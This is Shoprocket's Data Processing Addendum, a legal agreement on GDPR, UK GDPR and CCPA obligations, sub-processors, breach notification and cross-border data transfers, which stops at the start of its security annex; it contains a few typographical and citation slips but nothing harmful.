Shoprocket is rated 5/5 on Trustpilot 4.8/5

Shoprocket Data Processing Addendum

Last Updated: 30 th August 2022

This Shoprocket Data Processing Addendum ( “Addendum”) amends the Shoprocket Terms & Conditions (the “ Agreement”) by and between you (as defined below) and Shoprocket LTD, a private company limited by shares incorporated and registered in England and Wales with company number 12656598 and registered office address at 20-22 Wenlock Road, London, NG 17U, United Kingdom of Great Britain and Northern Ireland ( “Shoprocket”). 

Please note that where you have contracted with Shoprocket according to a separate Service Level Agreement ( “SLA”), rather than the Shoprocket Terms & Conditions, this Addendum is made under and amends the terms of the SLA, and any reference to the Agreement shall be deemed to be a reference to the SLA. 

This Addendum is subject to the terms of the Agreement and is incorporated into the Agreement. Capitalised terms that are not defined within this Addendum have the meaning given to them in the Agreement. 

  1. Definitions
Account Settings means the configurations and settings associated with your Shoprocket Account, including any controls, securities features and functionalities that allow you to manage how Shoprocket processes Personal Data. 
Business Purposes the Services to be provided by Shoprocket to you as defined in the Agreement.  
Client Account Data means Personal Data that relates to your relationship with Shoprocket, including the names or contact information of individuals authorised by you to access your Shoprocket Account and any billing information associated with these individuals. Your Client Account Data also includes any data Shoprocket may need to collect for the purposes of managing our relationship with you, conducting identity verification, or as otherwise required by applicable laws and regulations. 
Client Usage Data Means Service usage data collected and processed by Shoprocket in connection with your use of the Services, including without limitation data used to identify the source and destination of a communication, activity logs, and data used to optimise and maintain performances of the Services, and to prevent system abuse. 
Data Protection Legislation means any applicable laws and regulations in any relevant jurisdiction relating to the use or processing of Personal Data including: (i) the California Consumer Privacy Act 2018 ( “CCPA”); (ii) the General Data Protection Regulation ((EU) 2016/279) ( “EU GDPR”); (iii) the Swiss Federal Act on Data Protection; (iv) the EU GDPR as it forms part of the law of England and Wales, Scotland and Northern Ireland by virtue of section 3(10) (as supplemented by section 205(4)) of the Data Protection Act 2018 ( “UK GDPR”); (v) the Data Protection Act 2018 (and regulations made thereunder) ( “DPA 2018”); and (vi) the Privacy and Electronic Communications Regulations 2003 (SI 2003/2426) as amended ( “PECR 2003”); in each case, as updated, amended or replaced from time to time. The terms “Data Controller”, “ Data Processor”, Data Subject”, “ Data Subject Request”, “ Personal Data”, “ Personal Data Breach”, “ Processing”, “ Subprocessor”, and “ Supervisory Authority” shall have the meanings set forth in the EU GDPR. 
EEA the European Economic Area.
EU SCCs means the standard contractual clauses approved by the European Commission in Commission Decision 2021/914 dated 4 June 2021, for transfers of Personal Data to countries not otherwise recognised as offering an adequate level of protection for Personal Data by the European Commission within the meaning of Article 45 GDPR (as amended and updated from time to time). 
Ex-EEA Transfer means the transfer of Personal Data, which is processed in accordance with the EU GDPR, to a server, network, computing system,  undertaking, person or premise located outside of the EEA, and such transfer is not governed by an adequacy decision made by the European Commission in accordance with Article 45 EU GDPR. 
Ex-UK Transfer means the transfer of Personal Data, which is processed in accordance with the UK GDPR and the Data Protection Act 2018, to a server, network, computing system, undertaking, person or premise located outside the UK, and such transfer is not governed by an adequacy decision by the UK Secretary of State in accordance with the relevant provisions of the UK GDPR and the Data Protection Act 2018. 
Service Provider shall have the meaning given in the California Consumer Privacy Act of 2018 ( “CCPA”).
Services means those tools provided by Shoprocket that allow merchants to build and customise online stores, sell in multiple places (including web, mobile, social media, online marketplaces and other locations) ( “Shoprocket Store”), manage products, inventory, payments, fulfilment, shipping, business operations, marketing and advertising, and engage with existing and potential companies, and any tool or service marketed by Shoprocket from time to time.  
Shoprocket Account means a user account provisioned by Shoprocket that provides access to the Services and allows you to manage your Account Settings. The Shoprocket Account is accessible (without limitation) on https://www.shoprocket.io
Shoprocket Privacy Policy means the fair processing information notice made available by Shoprocket at https://shoprocket.io/privacy, as amended, substituted and/or supplemented from time to time. 
Shoprocket Store means your ecommerce presence as hosted or facilitated by Shoprocket as part of the Services. 
Special Category Data has the meanings given in Articles 4(13), 4(14), 4(15) and 9 of EU GDPR and UK GDPR (as applicable).
Standard Contractual Clauses (SCCs) means the EU SCCs and UK SCCs, as applicable. 
UK SCCs means the EU SCCs as revised and amended by the UK ICO’s International Data Transfer Addendum to EU Commission Standard Contractual Clauses ( “IDTA Addendum”). 
We/Us/Our means Shoprocket LTD trading as “ Shoprocket” and “ Shoprocket.io”. 
You/Your means the contractual party named in the Agreement. 
  1. Customer Instructions 
  1. Shoprocket and you agree that this Addendum and the Agreement (including any instructions you provide as to how Shoprocket may process Personal Data as part of your Account Settings) constitute your written documented instructions regarding Shoprocket’s processing of Personal Data (the “Documented Instructions”). Shoprocket will process the Personal Data only in accordance with the Documented Instructions. Additional instructions outside the scope of the Documented Instructions (if any) require prior written agreement between Shoprocket and you, including agreement on additional fees payable by you to Shoprocket for carrying out such instructions. 
  1. Shoprocket is entitled to terminate this DPA and the Agreement without incurring any liability to you if Shoprocket declines to follow instructions that are in contravention of the Data Protection Legislation or outside of the scope of, or changed from, those given or agreed to be given in this DPA or in any otherwise written agreement between the parties. 
  1. Taking into account the nature of the processing, you agree that it is unlikely that Shoprocket can form an opinion on whether the Documented Instructions infringe the Data Protection Legislation. If Shoprocket forms such an opinion, it will immediately inform you, in which case, you will be entitled to withdraw or modify your Documented Instructions. 
  1. Data Processing 
  1. When Shoprocket Processes Personal Data in the course of providing the Services, Shoprocket will:
  1. except for Client Account Data and Client Usage Data, process the Personal Data we collect on your behalf or pursuant to your use of the Services, insofar as the UK GDPR or EU GDPR applies, as a Data Processor and, insofar as the CCPA applies, as a Service Provider; 
  1. process as an independent Data Controller the Personal Data we collect directly from any customers of your Shoprocket Store(s);
  1. process and store Personal Data only on servers:
  1. operated by the cloud service provider Amazon Web Services ( “AWS”) within the AWS “eu-west-1” date centre region located in Ireland, or such other servers operated by AWS within the EEA;
  1. operated by the cloud service provider  ( “Hetzner”) at its data centres in Nuremberg and Falkenstein in Germany. 
  1. only process the Personal Data to the extent, and in such a manner, as is necessary for the Business Purposes in accordance with your written instructions (provided such instructions are commensurate with the functionalities of the Services purchased by you under the Agreement), and will not process the Personal Data for any other purpose or in a way that does not comply with this Addendum or the Data Protection Legislation (including where, in Shoprocket’s reasonable opinion, your written instructions do not comply with this Addendum or the Data Protection Legislation); 
  1. if Shoprocket is required by law to process the Personal Data for any other purpose, Shoprocket will provided you with notice of this requirement prior to conducting any such processing, unless Shoprocket is prohibited by law from providing such notice; 
  1. promptly comply with any written instructions you provide requiring Shoprocket to amend, transfer, delete or otherwise process the Personal Data, or to stop, mitigate or remedy any unauthorised processing; 
  1. maintain the confidentiality of the Personal Data and not disclose the Personal Data to third parties unless you or this Addendum specifically authorises the disclosure, or as required by domestic law, court or regulation (including any instruction of the UK ICO Commissioner or any other competent authority);
  1. reasonably assist you, at no additional expense to you, with meeting your compliance obligations under the Data Protection Legislation, taking into account the nature of Shoprocket’s processing and the information available to Shoprocket, including for illustrative purposes but not limited to,  providing you with reasonable information to help you complete any data protection impact assessments you conduct, and assisting you to respond to data subject requests; and
  1. promptly notify you of any changes to the Data Protection Legislation that may be reasonably interpreted as adversely affecting Shoprocket’s performance of the Agreement or this Addendum.  
  1. Shoprocket’s role as a Data Controller. The parties acknowledge and agree that with respect to the Client Account Data and Client Usage Data, Shoprocket is an independent Data Controller, not a joint controller with you. Shoprocket will process Client Account Data and Client Usage Data as a Data Controller to (i) manage its relationship with you; (ii) to carry out Shoprocket’s core business operations, such as accounting, audits, tax preparation and filing and compliance purposes; (iii) to monitor, investigate, prevent and detect fraud, security incidents and other misuse of the Services, and to prevent harm to you; (iv) for identity verification purposes; (v) to comply with legal or regulatory obligations applicable to the processing and retention of Personal Data to which Shoprocket is subject; and (iv) as otherwise permitted under the Data Protection Legislation and in accordance with this Addendum and the Agreement. Shoprocket may also process the Client Usage Data as a Data Controller to provide, optimise and maintain the Services, to the extent permitted by the Data Protection Laws. Any processing by Shoprocket as a Data Controller shall be in accordance with the Shoprocket Privacy Policy. 
  1. CCPA. Except with respect to the Customer Account Data and the Customer Usage Data, the parties acknowledge and agree that Shoprocket is a Service Provider for the purposes of the CCPA (to the extent it applies) and is receiving personal information form you in order to provide the Services pursuant to the Agreement, which constitutes a business purpose. Shoprocket shall not sell any such personal information. Shoprocket shall not retain, use or disclose any personal information provided by you pursuant to the Agreement except as necessary for the specific purpose of performing the Services for you pursuant to this Agreement, or otherwise as set forth in this Agreement or permitted in the CCPA. The terms “ personal information”, “ Service Provider”, “ sale”, and “ sell” shall have the meaning given in Section 1798.140 of the CPA (as amended, re-enacted or updated from time to time). Shoprocket certifies that it understands the restrictions of this clause 3.2.
  1. Add-ons. As part of the Services, Shoprocket offers you the opportunity to integrate your Shoprocket-powered store or website with certain third-party add-ons, integrations and applications ( “Add-Ons”). Please note that your use of the Add-Ons shall in each case be governed exclusively by the terms and conditions of the applicable end user licence agreement and accompanying privacy policies (together the “EULA”) included within the Add-On by its publisher (the “Add-On Publisher”). Each EULA is made exclusively by and between you and the Add-On Publisher, and Shoprocket is not party to such EULAs.
  1. Where you instruct us to integrate your Shoprocket products or accounts with one or more Add-Ons, you agree that Shoprocket shall transfer your Personal Data to the Add-On Publishers so that they may provide their services to you. Where Add-On Publishers subsequently process your Personal Data, this shall be governed by the relevant privacy provisions within their EULA, and Shoprocket is not responsible for such processing. 
  1. Add-Ons from the following Add-On Publishers are currently marketed on Shoprocket. 
Name  (click for Privacy Policy) Description
Amazon , eBay, Facebook Marketplace , Google Shopping , Instagram Shopping eCommerce integration option allows you to undertake multi-channel fulfilment order placement, provide up-to-date tracking information to your customers and sync your inventory levels. 
Affirm, Afterpay, AliPay, Apple Pay, Click to Pay, GrabPay, GooglePay, iDEAL, Klarna, Microsoft Pay, PayPal, Przelewy24 (P24), Sofort, Stripe, WeChat Pay Payment processing integration that allows you to take multi-currency payment through 30+ payment methods such as credit/debit card, bank account transfer, credit, voucher, EPS, FPX and others.   
Zapier Shoprocket’s Zapier integration allows you to automate data transfers and workflows between and across Shoprocket and your other web applications. 
  1. Please note that where Shoprocket allows you to integrate your Shoprocket Store or Shoprocket Account with an Add-On that is not named in the table above, such as where you integrate your chosen accounting software, CRM platform or shipping rate price aggregator with any of the Services, you use of any such Add-On shall be governed by the applicable EULA as in clause 3.2 of this Agreement.
  2. SCCs. If Shoprocket and you have entered into Standard Contractual Clauses as described in clause 10 (Transfers of Personal Data), (i) your instruction for Shoprocket under clause 3.4 of this Agreement to integrate the Add-On(s) (as applicable) as part of the Services will constitute your prior written consent to the transfer of Personal Data by Shoprocket to the Add-on Providers if such consent is required under the SCCs; (ii) the parties agree that the copies of the agreements with Add-on Publishers that must be provided by Shoprocket to you pursuant to Clause 9(c) of the EU SCCs or any relevant clause of the UK SCCs (as applicable) may have commercial information, or information unrelated to the Standard Contractual Clauses or their equivalent, removed by Shoprocket beforehand, and that such redacted copies will be provided by Shoprocket only upon your written request.  
  1. Your responsibilities. When Shoprocket processes Personal Data in the course of providing the Services, you shall:
  1. be the Data Controller in respect of any Personal Data Shoprocket collects on your behalf or pursuant to your use of the Services; 
  1. remain responsible for your compliance obligations under the applicable Data Protection Legislation, including but not limited to providing any required notices and obtaining any required consents in respect of which Shoprocket may process the Personal Data to fulfil the Business Purposes. 
  1. Personal Data Types and Processing Purposes 
  1. Subject Matter. The subject matter of the data processing under this Addendum is the Personal Data uploaded onto the Services, your Shoprocket Account and your Shoprocket Store. 
  1. Duration. As between Shoprocket and you, it is you who determines the duration of the data processing under this Addendum. You may suspend or terminate the data processing by suspending or terminating your Shoprocket subscription or suspending any Shoprocket-hosted integrations (such as any proprietary API that Shoprocket makes available to you) that you use as part of your business. 
  1. Purpose. The purpose of the data processing under this Addendum is the provision of the Services initiated by you from time to time, including for illustrative purposes the provision of your Shoprocket Store and Shoprocket Account.  
  1. Nature of the processing. Shoprocket allows users to build, customise and run online ecommerce stores, including providing the “Services” as defend in clause 1 of this Addendum. These Services include the processing of Personal Data by Shoprocket, its Sub-processors and, as applicable, the Add-On Publishers on systems that may contain Personal Data. 
  1. Types of Personal Data. Personal Data uploaded to the Services including by way of your Shoprocket Account, Shoprocket Store and any proprietary integrations that Shoprocket makes available that interface with your systems. 
  1. Categories of Data Subjects. The Data Subject could include you, your customers, employees, contractors, agents, suppliers and vendors.  
  1. Security of Data Processing 
  1. Shoprocket’s shall at all times implement appropriate technical and organisational measures against unauthorised or unlawful processing, access, copying, modification, reproduction, display or distribution of the Personal Data, and against accidental or unlawful loss, destruction, alteration, disclosure or damage of the Personal Data including, but not limited to the measures described in the Shoprocket Security Standards (Annex A), in each case to ensure a level of security of the Personal Data appropriate to the risk in accordance with Article 32 EU/UK GDPR. 
  1. Shoprocket shall implement such measures to ensure a level of security appropriate to the risk involved, including as appropriate: 
  1. the pseudonymisation and encryption of Personal Data; 
  1. the ability to ensure the ongoing confidentiality, integrity, availability and resilience of processing systems and services; 
  1. the ability to restore the availability and access to Personal Data in a timely manner in the event of a physical or technical incident; and
  1. a process for regularly testing, assessing and evaluating the effectiveness of the security measures.   
  1. Shoprocket’s Employees
  1. Shoprocket will ensure its employees, contractors and agents: 
  1. are informed of the confidential nature of the Personal Data and are bound by confidentiality obligations and use restrictions in respect of the Personal Data;
  1. have undertaken training on the Data Protection Legislation relating to handling Personal Data and how it applies to their particular duties; and
  1. are aware both of Shoprocket’s duties and their personal duties and obligations under the Data Protection Legislation and the Agreement.
  1. Security 
  1. Shoprocket shall at all times implement appropriate technical and organisational measures against unauthorised or unlawful processing, access, copying, modification, reproduction, display or distribution of the Personal Data, and against accidental or unlawful loss, destruction, alteration, disclosure or damage of Personal Data.
  1. Shoprocket shall implement such measures to ensure a level of security appropriate to the risk involved, including for illustrative purposes and as appropriate:
  1. the pseudonymisation and encryption of personal data;
  1. the ability to ensure the ongoing confidentiality, integrity, availability and resilience of processing systems and services;
  1. the ability to restore the availability and access to personal data in a timely manner in the event of a physical or technical incident; and
  1. a process for regularly testing, assessing and evaluating the effectiveness of the security measures.
  1. Personal Data Breach 
  1. Shoprocket shall within 72 hours and in any event without undue delay notify you if it becomes aware of:
  1. the loss, unintended destruction or damage, corruption or otherwise impairment of part or all of the Personal Data; 
  1. any accidental, unauthorised or unlawful processing of the Personal Data; or
  1. any Personal Data Breach. 
  1. Where Shoprocket becomes aware of any of the foregoing matters described in clauses 8.1(a), (b) and/or (c) above, it shall, without undue delay, also provide you with the following: 
  1. a description of the nature of the matter recorded in relation to clauses 8.1(a), (b) and/or (c), including the categories of in-scope Personal Data and approximate number of both Data Subjects and Personal Data records concerned; and
  1. a description of the measures taken or proposed to be taken to address the matters recorded in relation to clauses 8.1(a), (b) and/or (c), including measures to mitigate its possible adverse effects. 
  1. Immediately following any accidental, unauthorised or unlawful Personal Data processing or Personal Data breach, Shoprocket will contact you so that we can co-ordinate our investigation of the matter. 
  1. Shoprocket will not inform any third party of any accidental, unauthorised or unlawful processing of all or part of the Personal Data and/or a Personal Data Breach without first obtaining your written consent, except where such disclosure is necessary as part of the measures needed to address such processing or Personal Data Breach or where such disclosure is required by applicable law. 
  1. Shoprocket will cover reasonable expenses associated with the performance of its obligations under clauses 8.1 and 8.2 unless the matter arose as a result of your specific written instructions, negligence, wilful default or breach of the Addendum or Agreement, in which case you will cover all reasonable expenses (including Shoprocket’s reasonable expenses and those of its professional advisers).  
  1. Sub-processors 
  1. Shoprocket uses the following Sub-processors to host and/or process your data and Personal Data, to provide infrastructure and network services to support Shoprocket, and to perform service functions on our behalf as part of the Services: 
Name  Description Location
200OK LLC Trading as “Profitwell,” 2000K LLC provides Shoprocket with subscription reporting and analytics services. MA, USA. 
Amazon Web Services EMEA SARL  Amazon provides Shoprocket with cloud hosting, computing and storage services.  Luxembourg, EU. 
Automattic, Inc.  Trading as “Gravatar.” Automattic allows Shoprocket users to upload their pre-existing image and public profile data to the Shoprocket account.   CA, USA. 
Cloudfare, Inc.  Cloudfare provides network security and connectivity services to Shoprocket.   CA, USA. 
Crisp IM SAS Shoprocket uses Crisp IM’s live chat and customer messaging application as part of the Services so as to provide customer support to users.  France, EU. 
Facebook Technologies Ireland Limited Shoprocket uses Facebook Pixels to track conversions from Facebook ads, to optimise ads and to build targeted audiences for its Services.  Ireland, EU. 
Google Ireland Limited  Google Ireland provides its (a) Google Analytics user behaviour analytics services to Shoprocket; (b) its Adwords advertising placement and monetisation services to Shoprocket.  Ireland, EU. 
GmbH   provides  Shoprocket with cloud hosting, computing and storage services. Germany, EU. 
TPS Unlimited, Inc. Trading as “Taxjar,” TPS Unlimited, Inc. provides tax automation integrations that Shoprocket uses to automate calculation and invoicing of EU VAT and US sale taxes on Shoprocket Stores.     CA, USA. 
Twilio, Inc.  Trading as “Sendgrid,” Twilio, Inc. provides a multi-channel customer messaging and engagement service that Shoprocket uses to communicate with actual and potential customers via email and SMS and WhatsApp messaging.  Ireland, EU. 
Twitter, Inc.  Shoprocket uses Twitter’s Twitter Pixel integration, a conversion tracking website tag that allows Shoprocket to measure the performance of its advertisement campaigns by tracking clickthrough and engagement patterns of users who see Shoprocket’s ads.  CA, USA. 
  1. You authorise us to use the Sub-processors listed in clause 9.1 above as part of the Services, and further provide us with general authorisation to use other Sub-processors to provide processing activities with regard to Personal Data we collect from you under the Agreement ( “Authorised Subprocessors”). At least 30 days before Shoprocket engages a new Sub-processor, Shoprocket will update this Addendum and provide you with a mechanism to obtain notice of that update, such as publishing an information notice on the Shoprocket.io website, sending you an email notification or providing a notification on your Shoprocket Account. You may object to such an engagement by informing Shoprocket within 10 days of receipt of the aforementioned notice by Shoprocket, provided such objection is in writing and based on reasonable grounds relating to data protection. You acknowledge that certain Sub-processors are essential to providing the Services and that objecting to the use of a Sub-processor may prevent Shoprocket from offering part or all of the Services to you. 
  1. If you reasonably object to an engagement in accordance with clause 9.2, and Shoprocket cannot provide a commercially reasonable alternative that is reasonably acceptable to you within 90 days, you may discontinue use of the affected Service(s) and/or terminate the Agreement by providing written notice to Shoprocket. Discontinuation or termination shall not relieve you of your obligation to pay any fees owed to Shoprocket under this Agreement. 
  1. If you do not object to the engagement of a third party as a Sub-processor in accordance with clause 9.2 within 10 days of notice by Shoprocket, that third party will be deemed an Authorised Sub-processor for the purposes of the Agreement. 
  1. Where Shoprocket engages an Authorised Sub-processor as described in clause 9.2:
  1. Shoprocket will restrict the Authorised Sub-processor’s access to any data only to what is reasonably necessary to provide, maintain or improve the Services; 
  1. Shoprocket will enter into a written agreement with the Authorised Sub-processor, and to extent that the Sub-processor performs the same data processing services as provided by Shoprocket under this Addendum, Shoprocket will impose on the Authorised Sub-processor the same contractual obligations that Shoprocket has herein; and
  1. Shoprocket will remain responsible for its compliance with the obligations of this Addendum, and for any acts of omissions of the Authorised Sub-processor that cause Shoprocket to breach its obligations under this Addendum. 
  1. If Shoprocket and you have entered into Standard Contractual Clauses as described in clause 10 (Transfers of Personal Data), (i) the above authorisations will constitute your prior written consent to the subcontracting by Shoprocket of the processing of Personal Data if such consent is required under the SCCs; (ii) the parties agree that the copies of the agreements with Authorised Sub-processors that must be provided by Shoprocket to you pursuant to Clause 9(c) of the EU SCCs or any relevant clause of the UK SCCs (as applicable) may have commercial information, or information unrelated to the Standard Contractual Clauses or their equivalent, removed by Shoprocket beforehand, and that such redacted copies will be provided by Shoprocket only upon your written request. 
  1. Transfers of Personal Data 
  1. The parties agree that Shoprocket may transfer Personal Data processed under this Agreement outside the EEA, the UK, or Switzerland as necessary to provide the Services. You acknowledge that the processing operations of many of the Add-Ons Publishers and Authorised Sub-processors take place in the United States, and the transfer of your Personal Data is necessary for the provision of the Services to you. If Shoprocket transfers Personal Data protected under this Agreement to a jurisdiction for which the European Commission or UK Secretary of State (as applicable) has not issued an adequacy decision, Shoprocket will ensure that appropriate safeguards have been implemented for the transfer of Personal Data in accordance with the Data Protection Legislation. 
  1. Ex-EEA Transfers. The parties agree that ex-EEA Transfers are made pursuant to the EEU SCCs which are deemed entered into (and incorporated into this Addendum) as follows:
  1. Module One (Controller to Controller) of the EU SCCs apply when Shoprocket is processing Personal Data as a Data Controller pursuant to clause 3.2 of this Addendum; 
  1. Module Two (Controller to Processor) of the EU SCCs apply when you are a Data Controller and Shoprocket is processing Personal Data for you as a Data Processor pursuant to clause 3 of this Addendum. 
  1. For each Module, where applicable the following applies (and unless stated otherwise, references to clause numbers are references to clause numbers of the Modules):
  1. The optional docking clause in Clause 7 does not apply; 
  1. In Clause 9, Option 2 (general written authorisation) applies, and the minimum time period for prior notice of Sub-processor changes shall be as set forth in clause 9.2 of this Addendum; 
  1. In Clause 11, the optional language does not apply; 
  1. All square brackets in Clause 12 are hereby removed; 
  1. In Clause 17 (Option 10, the EU SCCs will be governed by Irish law; 
  1. In Clause 18(b), disputes will be resolved before the courts of Ireland; 
  1. Part 1 of Annex B (“Cross-Border Transfers”) to this Addendum contains the information required in Annex I of the EU SCCs; 
  1. Part 1 of Annex B (“Cross-Border Transfers”) to this Addendum contains the information required in Annex II of the EU SCCs; 
  1. By entering into this Addendum, the parties are deemed to have signed the EU SCCs incorporated herein, including their Annexes. 
  1. Ex-UK Transfers
  1. The parties agree that the IDTA Addendum shall apply to an ex-UK Transfer. Part 2 of Annex B (“Cross-Border Transfers”) contains the information required in the IDTA Addendum. 
  1. Transfers from Switzerland. The parties agree that transfers from Switzerland are made pursuant to the EU SCCs with the following modifications:
  1. The terms “General Data Protection Regulation” or “Regulation (EU) 2016/679” as utilised in the EU SCCs shall be interpreted to include the Federal Act on Data Protection of 19 June 2022 (the “FADP”), and as revised as of 25 September 2020, the “ Revised FADP”) with respect to data transfers subject to FADP. 
  1. The terms of the EU SCCs shall be interpreted to protect the data of legal entities until effective under the Revised FADP. 
  1. Clause 13 of the EU SCCs is modified to provide that the Federal Data Protection and Information Commissioner (“ FDPIC”) of Switzerland shall have authority over data transfers governed by the FADP and the appropriate EU Supervisory Authority shall have authority over data transfers governed by the EU GDPR. Subject to the foregoing, all other requirements of Clause 13 of the EU SCCs shall be observed. 
  1. The term “EU Member State” as utilised in the EU SCCs shall not be interpreted in such a way to exclude the Data Subjects in Switzerland from exercising their rights in their place of habitual residence in accordance with Clause 18(c) of the EU SCCs. 
  1. Supplementary Measures. In respect of any ex-EEA Transfer or ex-UK Transfer, the following supplementary measures shall apply:
  1. As of the date of this Addendum, the Data Importer has not received any formal legal requests from any government intelligence or security service/agencies in the country to which the Personal Data is being exported, for access to (or copies of) your Personal Data ( “Government Agency Requests”); 
  1. If, after the date of this Addendum, the Data Importer receives any Government Agency Requests, Shoprocket shall attempt to redirect the law enforcement or government agency to request the data directly from you. As part of this effort, you agree that we may provide your basis contact information to the government agency. If compelled to disclose your Personal Data to a law enforcement or government agency, Shoprocket shall give you reasonable notice of the demand and to cooperate to allow you to seek a protective order or other appropriate remedy unless Shoprocket is legally prohibited from doing so. Shoprocket shall not voluntarily disclose Personal Data to any law enforcement or government agency. Shoprocket shall (as soon as reasonably practicable) discuss and determine whether all or any of the transfers of Personal Data pursuant to this Addendum should be suspended in the light of any such Government Agency Requests; 
  1. Shoprocket and the Data Exporter will meet regularly to consider whether: 
  1. The protection afforded by the laws of the country of the Data Importer to data subjects whose Personal Data is being transferred is sufficient to provide broadly equivalent protection to that afforded in the EEA or UK, whichever the case may be; 
  1. Additional measures are reasonably necessary to enable the transfer to be compliant with the Date Protection Legislation; 
  1. It is still appropriate for Personal Data to be transferred to the relevant Data Importer, taking into account all relevant information available to the parties, together with guidance provided by the Supervisory Authorities. 
  1. If the Data Protection Laws require Shoprocket to execute the Standard Contractual Clauses applicable to a particular transfer of Personal Data to a Data Importer as a separate agreement, the Data Importer shall, on request of Shoprocket, promptly execute such Standard Contractual Clauses incorporating such amendments as may be reasonably be required by Shoprocket to reflect the applicable annexes, the details of the transfer and the requirements of the Data Protection Legislation; and 
  1. If either (i) any of the means of legitimising transfers outside of the EEA, UK or Switzerland set forth in this Addendum ceases to be valid; or (ii) any Supervisory Authority requires transfers of Personal Data pursuant to those means to be suspended, then the Data Importer may by notice to Shoprocket, with effect from the date set out in such notice, amend or put in place alternative arrangements in respect of such transfers, as required by Data Protection Legislation.
  1. Sub-processors. Where you consent to our appointment of a Sub-processor located outside of the EEA in compliance with the provisions of clause 9, or where you elect to integrate an Add-on from an Add-On Publisher outside the EEA in accordance with clause 3, you authorise us to enter into SSCs with that party, including in your name and on your behalf. 
  1. Complaints, Data Subject Requests and Third Party Rights 
  1. Shoprocket will take such reasonable technical and organisational measures as appropriate, and promptly provide such information to you as you may require, to enable you to comply with: 
  1. the rights of Data Subjects under the Data Protection Legislation, including subject access rights, the rights to rectify, port and erase personal data, object to the processing and automated processing of personal data, and restrict the processing of personal data; and
  1. information or assessment notices served on you by the UK ICO (or any other relevant regulator) under the Data Protection Legislation. 
  1. Shoprocket will notify you immediately in writing if it receives any complaint, notice or communication that relates directly or indirectly to the processing of the Personal Data or to either Shoprocket’s or your compliance with the Data Protection Legislation.
  2. Shoprocket will notify you within 14 days if it receive a request from a Data Subject for access to their Personal Data or to exercise any of their other rights under the Data Protection Legislation.
  3. Shoprocket will give you itss assistance in responding to any complaint, notice, communication or Data Subject request. 
  4. Shoprocket will not disclose the Personal Data to any Data Subject or to a third party other than in accordance with your written instructions, or as required by domestic law.
  1. Term and termination
    1. This Agreement will remain in full force and effect so long as:
  1. the Agreement remains in effect; or 
  2. Shoprocket retains any of the Personal Data related to the Agreement in its possession or control (the “ Term”).
  1. Any provision of this DPA that expressly or by implication should come into or continue in force on or after termination of the Agreement in order to protect the Personal Data will remain in full force and effect.
  2. Shoprocket’s failure to comply with the terms of this DPA is a material breach of the Agreement. In such event, you may terminate the Agreement effective immediately on written notice to the Shoprocket without incurring further liability or obligation. 
  3. If a change in any Data Protection Legislation prevents either party from fulfilling all or part of its Agreement obligations, the parties may agree to suspend the processing of the Personal Data until that processing complies with the new requirements. If the parties are unable to bring the Personal Data processing into compliance with the Data Protection Legislation within 90 days, either party may terminate the Agreement with immediate effect on written notice to the other party.
  1. Data Return and Destruction
    1. At your request, Shoprocket will give you, or a third party nominated in writing by you, a copy of or access to all or part of the Personal Data in its possession or control in the format and on the media reasonably specified by you.
    2. On termination or otherwise expiry of the Agreement for any reason, or upon completion of the Services, Shoprocket shall return or delete your Personal Data, unless further storage of Personal Data is required or authorised by applicable law. If return or destruction is impracticable or prohibited by law, rule or regulation, Shoprocket shall take measures to block such Personal Data from any further processing (except to the extent necessary for its continued hosting or processing required by law, rule or regulation) and shall continue to appropriately protect the Personal Data remaining in its possession, custody or control. If Shoprocket and you have entered into Standard Contractual Clauses as described in clause 10 (Transfers of Personal Data), the parties agree that the certification of deletion that is required under Clause 8.1(d) of the EU SCCs and any applicable provision of the UK SCCs (as applicable) shall be provided by Shoprocket to you only upon your written request. 
    3. If any law, regulation, or government or regulatory body requires for Shoprocket to retain any documents or materials or Personal Data that Shoprocket would otherwise be required to return or destroy, it will notify you in writing of that retention requirement, giving details of the documents, materials or Personal Data that it must retain, the legal basis for retention, and establishing a specific timeline for deletion or destruction once the retention requirement ends. 
    4. Shoprocket will certify in writing to you that it has destroyed the Personal Data within 30 days after it completes the deletion or destruction.
  2. Records
    1. Shoprocket will keep detailed, accurate and up-to-date written records regarding any processing of the Personal Data, including but not limited to, the access, control and security of the Personal Data, approved subcontractors, the processing purposes, categories of processing, any transfers of personal data to a third country and related safeguards, and a general description of the technical and organisational security measures implemented (the “Records”).
    2. Shoprocket will ensure that the Records are sufficient to enable you to verify Shoprocket’s compliance with its obligations under this Agreement and Shoprocket will provide you with copies of the Records upon request.
  1. Warranties 
  1. Shoprocket warrants and represents that: 
  1. its employees, subcontractors, agents and any other person or persons accessing the Personal Data on its behalf are reliable and trustworthy and have received the required training on the Data Protection Legislation;
  1. it and anyone operating on its behalf will process the Personal Data in compliance with the Data Protection Legislation and other laws, enactments, regulations, orders, standards and other similar instruments; 
  1. it has no reason to believe that the Data Protection Legislation prevents it from providing any of the Agreement's contracted services; and
  1. considering the current technology environment and implementation costs, it will take appropriate technical and organisational measures to prevent the unauthorised or unlawful processing of Personal Data and the accidental loss or destruction of, or damage to, Personal Data, and ensure a level of security appropriate to: 
  1. the harm that might result from such unauthorised or unlawful processing or accidental loss, destruction or damage; 
  2. the nature of the Personal Data protected; and
  3. comply with all applicable Data Protection Legislation and its information and security policies.
  1. Execution and Modifications 
    1. The terms of this Addendum are incorporated by reference into the Agreement and are made a part thereof as though fully set forth in the Agreement. By executing the Agreement, you expressly acknowledge and agree that you shall be bound by the terms of this Addendum. 
    2. Shoprocket may upon presenting thirty (30) calendar days’ prior written notice make any reasonable variations to this Addendum as required as a result of any change in, or decision of a competent authority under, the Data Protection Legislation, to allow processing of Personal Data to be made (or continue to be made) without breach of the Data Protection Legislation. In the event that you do not agree to any such variations then you may, within such thirty (30) calendar days’ notice period, present written notice to Shoprocket to terminate the Agreement (including this Addendum) with immediate effect to the extent that it relates to the Services which are affected by the proposed variations (or lack thereof). You shall pay Shoprocket all fees and otherwise sums that were incurred under or in connection with the Agreement before the date of termination and which remains unpaid as of the date of termination. You shall have no further claims (including requesting refunds for the Services) as a result of or in connection with the termination oof this Agreement pursuant to this clause 16.2.

Annex A

Shoprocket Security Standards

Capitalised terms not otherwise defined herein have the meanings assigned to them in the addendum. 

This Annex A addresses the technical and organisational measures, including practical safeguards and technical security measures, that Shoprocket maintains so as to (a) secure the Personal Data against accidental or unlawful loss, access or disclosure; (b) identify reasonably foreseeable and internal risks to security and unauthorised access to the Services, including your Shoprocket account; and (c) minimise security risks, including through risk assessment and regular testing. Shoprocket will designate one or more employees to be accountable for and respond to any questions on the information security practises and measures described below.  

  1. Shared Responsibility Model

